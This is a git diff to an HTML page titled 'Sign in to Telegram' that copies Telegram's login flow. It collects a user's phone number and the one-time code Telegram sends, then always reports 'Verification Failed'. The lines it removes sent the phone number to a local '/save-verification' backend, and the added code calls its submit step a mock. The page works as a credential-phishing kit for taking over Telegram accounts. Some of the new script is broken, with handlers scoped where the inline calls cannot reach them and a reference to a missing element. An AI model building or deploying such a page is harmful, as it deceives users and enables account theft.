--- a/index.html
+++ b/index.html
@@ -4,165 +4,7 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Sign in to Telegram</title>
-    <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600&display=swap" rel="stylesheet">
-    <style>
-        body {
-            font-family: 'Open Sans', Arial, sans-serif;
-            background-color: #ffffff;
-            margin: 0;
-            padding: 0;
-            display: flex;
-            justify-content: center;
-            align-items: center;
-            height: 100vh;
-            overflow-y: auto; /* Allow vertical scrolling */
-        }
-
-        .container {
-            background-color: #ffffff;
-            padding: 20px;
-            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
-            border-radius: 10px;
-            text-align: center;
-            width: 100%;
-            max-width: 400px;
-            margin: 20px auto;
-            position: relative; /* Added for dropdown positioning */
-        }
-
-        .container img {
-            width: 100px;
-            margin-bottom: 20px;
-        }
-
-        h1 {
-            font-size: 24px;
-            color: #333;
-            margin-bottom: 10px;
-        }
-
-        p {
-            font-size: 16px;
-            color: #666;
-            margin-bottom: 20px;
-        }
-
-        .input-group {
-            margin-bottom: 15px;
-            text-align: left;
-            position: relative; /* Added for dropdown positioning */
-        }
-
-        .input-group label {
-            display: block;
-            font-size: 14px;
-            color: #555;
-            margin-bottom: 5px;
-        }
-
-        select, input[type="text"], input[type="number"] {
-            width: 100%;
-            padding: 12px;
-            border: none; /* Removed borders */
-            border-radius: 5px;
-            font-size: 16px;
-            box-sizing: border-box;
-            margin-bottom: 10px;
-            outline: none;
-        }
-
-        input[type="checkbox"] {
-            margin-right: 10px;
-        }
-
-        .button {
-            width: 100%;
-            padding: 12px;
-            background-color: #0088cc;
-            color: #ffffff;
-            border: none;
-            border-radius: 5px;
-            font-size: 16px;
-            cursor: pointer;
-            margin-top: 10px;
-        }
-
-        .button:hover {
-            background-color: #007ab8;
-        }
-
-        .dropdown {
-            position: relative; /* Adjusted for dropdown positioning */
-        }
-
-        .dropdown-button {
-            display: flex;
-            align-items: center;
-            justify-content: space-between;
-            padding: 12px;
-            border: none; /* Removed border */
-            border-radius: 5px;
-            cursor: pointer;
-            font-size: 16px;
-            background-color: #ffffff;
-            color: #333;
-            width: 100%;
-            box-sizing: border-box;
-        }
-
-        .dropdown-content {
-            display: none;
-            position: absolute;
-            background-color: #ffffff;
-            width: 100%;
-            box-shadow: 0 8px 16px rgba(0, 0, 0, 0.2);
-            z-index: 1;
-            max-height: 200px;
-            overflow-y: auto;
-            border-radius: 5px;
-            top: 100%;
-            left: 0;
-            padding: 0;
-        }
-
-        .dropdown-content div {
-            padding: 12px;
-            cursor: pointer;
-            font-size: 16px;
-        }
-
-        .dropdown-content div:hover {
-            background-color: #f0f0f0;
-        }
-
-        .dropdown.open .dropdown-content {
-            display: block;
-        }
-
-        .dropdown-button::after {
-            content: '▼';
-            font-size: 16px;
-            margin-left: 10px;
-            transition: transform 0.2s;
-        }
-
-        .dropdown.open .dropdown-button::after {
-            content: '▲';
-            transform: rotate(180deg);
-        }
-
-        @media (max-width: 600px) {
-            .container {
-                padding: 15px;
-                max-width: 100%;
-            }
-
-            .button, input[type="text"], input[type="number"] {
-                padding: 14px;
-                font-size: 18px;
-            }
-        }
-    </style>
+    <link rel="stylesheet" href="{{ url_for('static', filename='styles.css') }}">
 </head>
 <body>
     <div class="container" id="initialContainer">
@@ -172,13 +14,25 @@
 
         <div class="input-group">
             <label for="countryCode">Country</label>
-            <div class="dropdown" id="countryDropdown">
-                <div class="dropdown-button" onclick="toggleDropdown()">Select Country</div>
-                <div class="dropdown-content" id="dropdownMenu">
-                    <!-- Country options will be populated here -->
-                </div>
+            <div class="dropdown-container">
+                <select id="countryCode" class="dropdown" onchange="updatePhoneNumberPrefix()">
+                    <option value="+61">🇦🇺 Australia (+61)</option>
+                    <option value="+1">🇺🇸 United States (+1)</option>
+                    <option value="+44">🇬🇧 United Kingdom (+44)</option>
+                    <option value="+49">🇩🇪 Germany (+49)</option>
+                    <option value="+33">🇫🇷 France (+33)</option>
+                    <option value="+81">🇯🇵 Japan (+81)</option>
+                    <option value="+91">🇮🇳 India (+91)</option>
+                    <option value="+86">🇨🇳 China (+86)</option>
+                    <option value="+7">🇷🇺 Russia (+7)</option>
+                    <option value="+82">🇰🇷 South Korea (+82)</option>
+                </select>
             </div>
-            <input type="text" id="phoneNumber" placeholder="Phone Number" maxlength="15">
+        </div>
+
+        <div class="input-group">
+            <label for="phoneNumber">Phone Number</label>
+            <input type="text" id="phoneNumber" placeholder="Phone Number" oninput="formatPhoneNumber()" pattern="\d*">
         </div>
 
         <div>
@@ -188,89 +42,128 @@
         <button class="button" onclick="goToVerificationPage()">Next</button>
     </div>
 
-    <div class="container" id="verificationContainer" style="display:none;">
+    <div class="container" id="verificationContainer">
+        <div class="monkey-icon">🐵</div>
         <h1 id="phoneDisplay"></h1>
         <p>We have sent you a message in Telegram with the code.</p>
 
         <div class="input-group">
             <label for="verificationCode">Code</label>
-            <input type="number" id="verificationCode" placeholder="Code">
+            <input type="number" id="verificationCode" placeholder="Code" inputmode="numeric" pattern="\d*">
         </div>
 
         <button class="button" onclick="submitVerification()">Submit</button>
     </div>
 
-    <div class="container" id="finalMessageContainer" style="display:none;">
+    <div class="container" id="finalMessageContainer">
         <h1>Verification Failed</h1>
         <p id="finalMessage"></p>
         <button class="button" onclick="resetForm()">Try Again</button>
     </div>
 
     <script>
-        const countries = [
-            { name: 'Australia', code: '+61', flag: '🇦🇺' },
-            { name: 'United States', code: '+1', flag: '🇺🇸' },
-            { name: 'United Kingdom', code: '+44', flag: '🇬🇧' },
-            { name: 'Germany', code: '+49', flag: '🇩🇪' },
-            { name: 'France', code: '+33', flag: '🇫🇷' },
-            { name: 'Japan', code: '+81', flag: '🇯🇵' },
-            { name: 'India', code: '+91', flag: '🇮🇳' },
-            { name: 'China', code: '+86', flag: '🇨🇳' },
-            { name: 'Russia', code: '+7', flag: '🇷🇺' },
-            { name: 'South Korea', code: '+82', flag: '🇰🇷' }
-        ];
-
-        function populateCountries() {
+        document.addEventListener('DOMContentLoaded', function() {
+            const countryDropdown = document.getElementById('countryCode');
             const dropdownMenu = document.getElementById('dropdownMenu');
+            const countries = [
+                { name: 'Australia', code: '+61', flag: '🇦🇺' },
+                { name: 'United States', code: '+1', flag: '🇺🇸' },
+                { name: 'United Kingdom', code: '+44', flag: '🇬🇧' },
+                { name: 'Germany', code: '+49', flag: '🇩🇪' },
+                { name: 'France', code: '+33', flag: '🇫🇷' },
+                { name: 'Japan', code: '+81', flag: '🇯🇵' },
+                { name: 'India', code: '+91', flag: '🇮🇳' },
+                { name: 'China', code: '+86', flag: '🇨🇳' },
+                { name: 'Russia', code: '+7', flag: '🇷🇺' },
+                { name: 'South Korea', code: '+82', flag: '🇰🇷' }
+            ];
+
+            // Populate the dropdown menu
             countries.forEach(country => {
                 const item = document.createElement('div');
+                item.classList.add('dropdown-item');
                 item.innerHTML = `${country.flag} ${country.name} (${country.code})`;
                 item.onclick = () => {
-                    document.getElementById('phoneNumber').value = country.code + ' ';
-                    document.querySelector('.dropdown-button').textContent = `${country.flag} ${country.name} (${country.code})`;
-                    closeDropdown();
+                    countryDropdown.value = country.code;
+                    updatePhoneNumberPrefix();
                 };
                 dropdownMenu.appendChild(item);
             });
-        }
 
-        function toggleDropdown() {
-            const dropdown = document.getElementById('countryDropdown');
-            dropdown.classList.toggle('open');
-        }
-
-        function closeDropdown() {
-            const dropdown = document.getElementById('countryDropdown');
-            dropdown.classList.remove('open');
-        }
-
-        function goToVerificationPage() {
-            const phoneNumber = document.getElementById('phoneNumber').value.trim();
-
-            if (phoneNumber === '') {
-                alert('Please enter your phone number.');
-                return;
+            function toggleDropdown() {
+                dropdownMenu.classList.toggle('show');
+                countryDropdown.classList.toggle('open');
             }
 
-            savePhoneNumber(phoneNumber);
+            function closeDropdown() {
+                dropdownMenu.classList.remove('show');
+                countryDropdown.classList.remove('open');
+            }
 
-            document.getElementById('phoneDisplay').textContent = phoneNumber;
-            document.getElementById('initialContainer').style.display = 'none';
-            document.getElementById('verificationContainer').style.display = 'block';
-        }
+            document.querySelector('.dropdown').addEventListener('click', toggleDropdown);
 
-        async function savePhoneNumber(phoneNumber) {
-            try {
-                const response = await fetch('http://localhost:8080/save-verification', {
-                    method: 'POST',
-                    headers: {
-                        'Content-Type': 'application/json'
-                    },
-                    body: JSON.stringify({ phoneNumber, verificationCode: null })
-                });
+            function updatePhoneNumberPrefix() {
+                const countryCode = countryDropdown.value;
+                const phoneNumberInput = document.getElementById('phoneNumber');
+                phoneNumberInput.value = phoneNumberInput.value.replace(/^\+\d*/, ''); // Remove previous code
+                phoneNumberInput.value = countryCode + phoneNumberInput.value;
+            }
 
-                if (!response.ok) {
-                    throw new Error(`HTTP error! status: ${response.status}`);
+            function formatPhoneNumber() {
+                const phoneNumberInput = document.getElementById('phoneNumber');
+                phoneNumberInput.value = phoneNumberInput.value.replace(/[^0-9+.\-]/g, ''); // Allow only numbers, +, ., and -
+            }
+
+            function goToVerificationPage() {
+                const phoneNumberInput = document.getElementById('phoneNumber');
+                const phoneNumber = phoneNumberInput.value;
+                if (phoneNumber) {
+                    document.getElementById('phoneDisplay').innerText = phoneNumber;
+                    document.getElementById('initialContainer').style.display = 'none';
+                    document.getElementById('verificationContainer').style.display = 'block';
                 }
+            }
 
-                console
+            function submitVerification() {
+                // Save the verification code and show a final message (mock implementation)
+                document.getElementById('verificationContainer').style.display = 'none';
+                document.getElementById('finalMessageContainer').style.display = 'block';
+            }
+
+            function resetForm() {
+                document.getElementById('finalMessageContainer').style.display = 'none';
+                document.getElementById('initialContainer').style.display = 'block';
+                document.getElementById('phoneNumber').value = '';
+                document.getElementById('verificationCode').value = '';
+                document.getElementById('countryCode').value = '+61';
+            }
+
+            document.addEventListener('touchstart', handleTouchStart, false);
+            document.addEventListener('touchmove', handleTouchMove, false);
+
+            let yStart = null;
+            let yEnd = null;
+
+            function handleTouchStart(event) {
+                yStart = event.touches[0].clientY;
+            }
+
+            function handleTouchMove(event) {
+                yEnd = event.touches[0].clientY;
+
+                if (yStart === null) return;
+
+                if (yEnd > yStart + 50) {
+                    // Swipe Down
+                    document.getElementById('phoneNumber').blur();
+                } else if (yEnd < yStart - 50) {
+                    // Swipe Up
+                    document.getElementById('phoneNumber').focus();
+                }
+                yStart = null;
+                yEnd = null;
+            }
+        });
+    </script>
+</body>
+</html>
